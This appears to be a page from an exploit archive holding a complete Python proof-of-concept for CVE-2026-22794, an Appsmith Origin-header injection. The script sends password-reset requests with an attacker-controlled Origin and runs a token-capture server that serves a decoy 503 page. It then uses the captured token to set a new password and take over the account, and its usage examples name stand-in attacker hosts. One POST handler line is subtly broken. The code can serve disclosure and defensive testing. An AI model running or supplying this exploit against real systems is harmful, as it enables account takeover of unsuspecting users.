4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-22794 - Appsmith Origin Header Injection PoC
======================================================

Vulnerability: Password Reset Link Hijacking via Origin Header Manipulation
Affected Software: Appsmith (versions prior to patch)
Severity: Critical (CVSS 9.1)
Impact: Full Account Takeover

Description:
    Appsmith uses the HTTP Origin header without validation to construct
    password reset and email verification URLs. An attacker can inject a
    malicious Origin header to redirect password reset tokens to an
    attacker-controlled server, resulting in full account takeover.

Author: Security Researcher
Disclaimer: This tool is for authorized security testing only.
            Unauthorized access to computer systems is illegal.
"""

import argparse
import requests
import threading
import socket
import sys
import time
import urllib.parse
from http.server import HTTPServer, BaseHTTPRequestHandler
from datetime import datetime
from colorama import Fore, Style, init

# Initialize colorama for cross-platform colored output
init(autoreset=True)

# Fix Windows console encoding
import io
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8', errors='replace')
sys.stderr = io.TextIOWrapper(sys.stderr.buffer, encoding='utf-8', errors='replace')

# Banner (ASCII-safe for Windows compatibility)
BANNER = f"""
{Fore.RED}+===================================================================+
|                   CVE-2026-22794 EXPLOIT                          |
|           Appsmith Origin Header Injection PoC                    |
|                  Password Reset Token Hijack                      |
+===================================================================+{Style.RESET_ALL}

{Fore.YELLOW}[!] DISCLAIMER: For authorized security testing only!{Style.RESET_ALL}
{Fore.YELLOW}[!] Unauthorized access to computer systems is illegal.{Style.RESET_ALL}
"""

# Global storage for captured tokens
captured_tokens = []


class TokenCaptureHandler(BaseHTTPRequestHandler):
    """HTTP Handler to capture password reset tokens."""
    
    def log_message(self, format, *args):
        """Custom logging to show captured requests."""
        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print(f"{Fore.GREEN}[{timestamp}] {Fore.CYAN}Request: {args[0]}{Style.RESET_ALL}")
    
    def do_GET(self):
        """Handle GET requests - capture reset tokens."""
        global captured_tokens
        
        parsed_path = urllib.parse.urlparse(self.path)
        query_params = urllib.parse.parse_qs(parsed_path.query)
        
        print(f"\n{Fore.GREEN}{'='*60}")
        print(f"{Fore.RED}[+] INCOMING REQUEST CAPTURED!{Style.RESET_ALL}")
        print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}")
        print(f"{Fore.YELLOW}[*] Path: {Fore.WHITE}{self.path}{Style.RESET_ALL}")
        print(f"{Fore.YELLOW}[*] Client: {Fore.WHITE}{self.client_address[0]}:{self.client_address[1]}{Style.RESET_ALL}")
        
        # Check for reset token
        if 'token' in query_params:
            token = query_params['token'][0]
            captured_tokens.append({
                'token': token,
                'timestamp': datetime.now().isoformat(),
                'path': self.path,
                'client_ip': self.client_address[0]
            })
            print(f"\n{Fore.RED}[!!!] PASSWORD RESET TOKEN CAPTURED!{Style.RESET_ALL}")
            print(f"{Fore.RED}[!!!] Token: {Fore.WHITE}{token}{Style.RESET_ALL}")
            print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}\n")
            
            # Save token to file
            with open('captured_tokens.txt', 'a') as f:
                f.write(f"{datetime.now().isoformat()} | {token} | {self.client_address[0]}\n")
        
        # Send a convincing phishing page
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        
        # Fake "server error" page to avoid suspicion
        response = """
        <!DOCTYPE html>
        <html>
        <head>
            <title>Service Temporarily Unavailable</title>
            <style>
                body { font-family: Arial, sans-serif; text-align: center; padding: 50px; }
                h1 { color: #333; }
                p { color: #666; }
            </style>
        </head>
        <body>
            <h1>503 Service Temporarily Unavailable</h1>
            <p>The server is temporarily unable to service your request. Please try again later.</p>
        </body>
        </html>
        """
        self.wfile.write(response.encode())
    
    def do_POST(self):
        """Handle POST requests."""
        content_length = int(self.headers.get('Content-Length', 0))
        post_data = self.requestline.read(content_length) if content_length else b''
        
        print(f"\n{Fore.YELLOW}[*] POST Data Received: {post_data.decode()}{Style.RESET_ALL}")
        
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(b'{"status": "ok"}')


def start_capture_server(port: int, host: str = "0.0.0.0"):
    """Start the token capture HTTP server."""
    server = HTTPServer((host, port), TokenCaptureHandler)
    print(f"{Fore.GREEN}[+] Token capture server started on {host}:{port}{Style.RESET_ALL}")
    print(f"{Fore.YELLOW}[*] Waiting for victim to click the malicious reset link...{Style.RESET_ALL}\n")
    server.serve_forever()


def send_malicious_reset_request(
    target_url: str,
    victim_email: str,
    attacker_origin: str,
    timeout: int = 30
) -> dict:
    """
    Send a password reset request with a malicious Origin header.
    
    Args:
        target_url: The Appsmith target URL (e.g., https://appsmith.target.com)
        victim_email: The victim's email address
        attacker_origin: The attacker's server URL to receive the token
        timeout: Request timeout in seconds
        
    Returns:
        dict: Result containing success status and response details
    """
    
    # Construct the API endpoint
    api_endpoint = f"{target_url.rstrip('/')}/api/v1/users/forgotPassword"
    
    # Malicious headers with attacker-controlled Origin
    headers = {
        'Content-Type': 'application/json',
        'Origin': attacker_origin,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'application/json, text/plain, */*',
        'Accept-Language': 'en-US,en;q=0.9',
        'Referer': f"{target_url}/user/forgotPassword",
    }
    
    # Request payload
    payload = {
        'email': victim_email
    }
    
    print(f"\n{Fore.CYAN}[*] Sending malicious password reset request...{Style.RESET_ALL}")
    print(f"{Fore.YELLOW}[*] Target: {Fore.WHITE}{api_endpoint}{Style.RESET_ALL}")
    print(f"{Fore.YELLOW}[*] Victim Email: {Fore.WHITE}{victim_email}{Style.RESET_ALL}")
    print(f"{Fore.RED}[*] Malicious Origin: {Fore.WHITE}{attacker_origin}{Style.RESET_ALL}")
    
    try:
        response = requests.post(
            api_endpoint,
            json=payload,
            headers=headers,
            timeout=timeout,
            verify=True  # Set to False for self-signed certs in testing
        )
        
        result = {
            'success': response.status_code in [200, 201, 202],
            'status_code': response.status_code,
            'response': response.text,
            'headers': dict(response.headers)
        }
        
        if result['success']:
            print(f"\n{Fore.GREEN}[+] SUCCESS! Password reset email triggered!{Style.RESET_ALL}")
            print(f"{Fore.GREEN}[+] Status Code: {response.status_code}{Style.RESET_ALL}")
            print(f"{Fore.YELLOW}[*] The victim will receive an email with a link pointing to:{Style.RESET_ALL}")
            print(f"{Fore.RED}    {attacker_origin}/user/resetPassword?token=XXXXX{Style.RESET_ALL}")
            print(f"\n{Fore.CYAN}[*] Waiting for victim to click the link...{Style.RESET_ALL}")
        else:
            print(f"\n{Fore.RED}[-] Request failed with status code: {response.status_code}{Style.RESET_ALL}")
            print(f"{Fore.YELLOW}[*] Response: {response.text[:500]}{Style.RESET_ALL}")
        
        return result
        
    except requests.exceptions.Timeout:
        print(f"{Fore.RED}[-] Request timed out{Style.RESET_ALL}")
        return {'success': False, 'error': 'timeout'}
    except requests.exceptions.ConnectionError as e:
        print(f"{Fore.RED}[-] Connection error: {e}{Style.RESET_ALL}")
        return {'success': False, 'error': str(e)}
    except Exception as e:
        print(f"{Fore.RED}[-] Unexpected error: {e}{Style.RESET_ALL}")
        return {'success': False, 'error': str(e)}


def reset_password_with_token(
    target_url: str,
    token: str,
    new_password: str,
    timeout: int = 30
) -> dict:
    """
    Complete the account takeover by resetting the password with the captured token.
    
    Args:
        target_url: The Appsmith target URL
        token: The captured password reset token
        new_password: The new password to set
        timeout: Request timeout in seconds
        
    Returns:
        dict: Result containing success status and response details
    """
    
    api_endpoint = f"{target_url.rstrip('/')}/api/v1/users/resetPassword"
    
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'application/json, text/plain, */*',
    }
    
    payload = {
        'token': token,
        'password': new_password
    }
    
    print(f"\n{Fore.RED}[!] EXECUTING ACCOUNT TAKEOVER...{Style.RESET_ALL}")
    print(f"{Fore.YELLOW}[*] Using captured token: {token[:20]}...{Style.RESET_ALL}")
    
    try:
        response = requests.post(
            api_endpoint,
            json=payload,
            headers=headers,
            timeout=timeout,
            verify=True
        )
        
        if response.status_code in [200, 201]:
            print(f"\n{Fore.GREEN}{'='*60}")
            print(f"{Fore.GREEN}[+] ACCOUNT TAKEOVER SUCCESSFUL!{Style.RESET_ALL}")
            print(f"{Fore.GREEN}[+] Password has been reset to: {new_password}{Style.RESET_ALL}")
            print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}\n")
            return {'success': True, 'status_code': response.status_code}
        else:
            print(f"{Fore.RED}[-] Password reset failed: {response.status_code}{Style.RESET_ALL}")
            return {'success': False, 'status_code': response.status_code, 'response': response.text}
            
    except Exception as e:
        print(f"{Fore.RED}[-] Error: {e}{Style.RESET_ALL}")
        return {'success': False, 'error': str(e)}


def check_vulnerability(target_url: str) -> bool:
    """
    Check if the target is potentially vulnerable to CVE-2026-22794.
    
    Args:
        target_url: The Appsmith target URL
        
    Returns:
        bool: True if potentially vulnerable, False otherwise
    """
    
    print(f"\n{Fore.CYAN}[*] Checking if target is vulnerable...{Style.RESET_ALL}")
    
    try:
        # Try to access the forgot password endpoint
        check_url = f"{target_url.rstrip('/')}/api/v1/users/forgotPassword"
        
        # Send OPTIONS request to check CORS
        response = requests.options(
            check_url,
            headers={'Origin': 'https://evil-attacker.com'},
            timeout=10
        )
        
        # Check if the endpoint exists and accepts cross-origin
        if response.status_code in [200, 204]:
            cors_header = response.headers.get('Access-Control-Allow-Origin', '')
            if cors_header == '*' or 'evil-attacker.com' in cors_header:
                print(f"{Fore.RED}[+] Target appears VULNERABLE! CORS is misconfigured.{Style.RESET_ALL}")
                return True
        
        # Also check if we can access the API
        test_response = requests.post(
            check_url,
            json={'email': '[email protected]'},
            headers={'Origin': 'https://evil-attacker.com', 'Content-Type': 'application/json'},
            timeout=10
        )
        
        if test_response.status_code != 403:
            print(f"{Fore.YELLOW}[?] Target may be vulnerable. Manual verification recommended.{Style.RESET_ALL}")
            return True
        else:
            print(f"{Fore.GREEN}[-] Target appears to validate Origin header.{Style.RESET_ALL}")
            return False
            
    except Exception as e:
        print(f"{Fore.YELLOW}[?] Could not determine vulnerability status: {e}{Style.RESET_ALL}")
        return False


def get_public_ip() -> str:
    """Get the public IP address of the attacker machine."""
    try:
        response = requests.get('https://api.ipify.org', timeout=5)
        return response.text
    except:
        return "YOUR_PUBLIC_IP"


def main():
    """Main function to run the exploit."""
    
    print(BANNER)
    
    parser = argparse.ArgumentParser(
        description='CVE-2026-22794 - Appsmith Origin Header Injection Exploit',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Start token capture server only
  python exploit.py --listen --port 8080
  
  # Send malicious reset request
  python exploit.py --target https://appsmith.target.com --email [email protected] --attacker-url https://attacker.com
  
  # Full automated attack
  python exploit.py --target https://appsmith.target.com --email [email protected] --attacker-url https://attacker.com --listen --port 8080
  
  # Use captured token to reset password
  python exploit.py --target https://appsmith.target.com --reset-token CAPTURED_TOKEN --new-password NewP@ssw0rd!
  
  # Check if target is vulnerable
  python exploit.py --target https://appsmith.target.com --check
        """
    )
    
    parser.add_argument(
        '-t', '--target',
        help='Target Appsmith URL (e.g., https://appsmith.target.com)'
    )
    
    parser.add_argument(
        '-e', '--email',
        help='Victim email address'
    )
    
    parser.add_argument(
        '-a', '--attacker-url',
        help='Attacker server URL to receive the token (e.g., https://attacker.com)'
    )
    
    parser.add_argument(
        '-l', '--listen',
        action='store_true',
        help='Start HTTP server to capture tokens'
    )
    
    parser.add_argument(
        '-p', '--port',
        type=int,
        default=8080,
        help='Port for token capture server (default: 8080)'
    )
    
    parser.add_argument(
        '--host',
        default='0.0.0.0',
        help='Host to bind capture server (default: 0.0.0.0)'
    )
    
    parser.add_argument(
        '-r', '--reset-token',
        help='Use a captured token to reset password'
    )
    
    parser.add_argument(
        '-n', '--new-password',
        help='New password to set (used with --reset-token)'
    )
    
    parser.add_argument(
        '-c', '--check',
        action='store_true',
        help='Check if target is vulnerable'
    )
    
    parser.add_argument(
        '--timeout',
        type=int,
        default=30,
        help='Request timeout in seconds (default: 30)'
    )
    
    args = parser.parse_args()
    
    # If no arguments, show help
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(0)
    
    # Check vulnerability
    if args.check:
        if not args.target:
            print(f"{Fore.RED}[-] Please specify target URL with --target{Style.RESET_ALL}")
            sys.exit(1)
        check_vulnerability(args.target)
        sys.exit(0)
    
    # Reset password with token
    if args.reset_token:
        if not args.target or not args.new_password:
            print(f"{Fore.RED}[-] Please specify --target and --new-password{Style.RESET_ALL}")
            sys.exit(1)
        reset_password_with_token(args.target, args.reset_token, args.new_password, args.timeout)
        sys.exit(0)
    
    # Start the capture server in background if requested
    if args.listen:
        public_ip = get_public_ip()
        print(f"{Fore.CYAN}[*] Your public IP: {public_ip}{Style.RESET_ALL}")
        print(f"{Fore.YELLOW}[*] Make sure port {args.port} is accessible from the internet{Style.RESET_ALL}")
        
        server_thread = threading.Thread(
            target=start_capture_server,
            args=(args.port, args.host),
            daemon=True
        )
        server_thread.start()
        time.sleep(1)  # Give server time to start
    
    # Send malicious reset request
    if args.target and args.email and args.attacker_url:
        result = send_malicious_reset_request(
            args.target,
            args.email,
            args.attacker_url,
            args.timeout
        )
        
        # If listening, keep the server running
        if args.listen and result.get('success'):
            print(f"\n{Fore.CYAN}[*] Server is running. Press Ctrl+C to stop.{Style.RESET_ALL}")
            try:
                while True:
                    time.sleep(1)
                    if captured_tokens:
                        print(f"\n{Fore.GREEN}[+] Tokens captured so far: {len(captured_tokens)}{Style.RESET_ALL}")
                        for t in captured_tokens:
                            print(f"    - {t['token'][:30]}... ({t['timestamp']})")
            except KeyboardInterrupt:
                print(f"\n{Fore.YELLOW}[*] Shutting down...{Style.RESET_ALL}")
                if captured_tokens:
                    print(f"\n{Fore.GREEN}[+] Total tokens captured: {len(captured_tokens)}{Style.RESET_ALL}")
                    print(f"{Fore.YELLOW}[*] Tokens saved to captured_tokens.txt{Style.RESET_ALL}")
    
    elif args.listen:
        # Just run the server
        try:
            while True:
                time.sleep(1)
        except KeyboardInterrupt:
            print(f"\n{Fore.YELLOW}[*] Shutting down...{Style.RESET_ALL}")
    
    else:
        parser.print_help()


if __name__ == '__main__':
    main()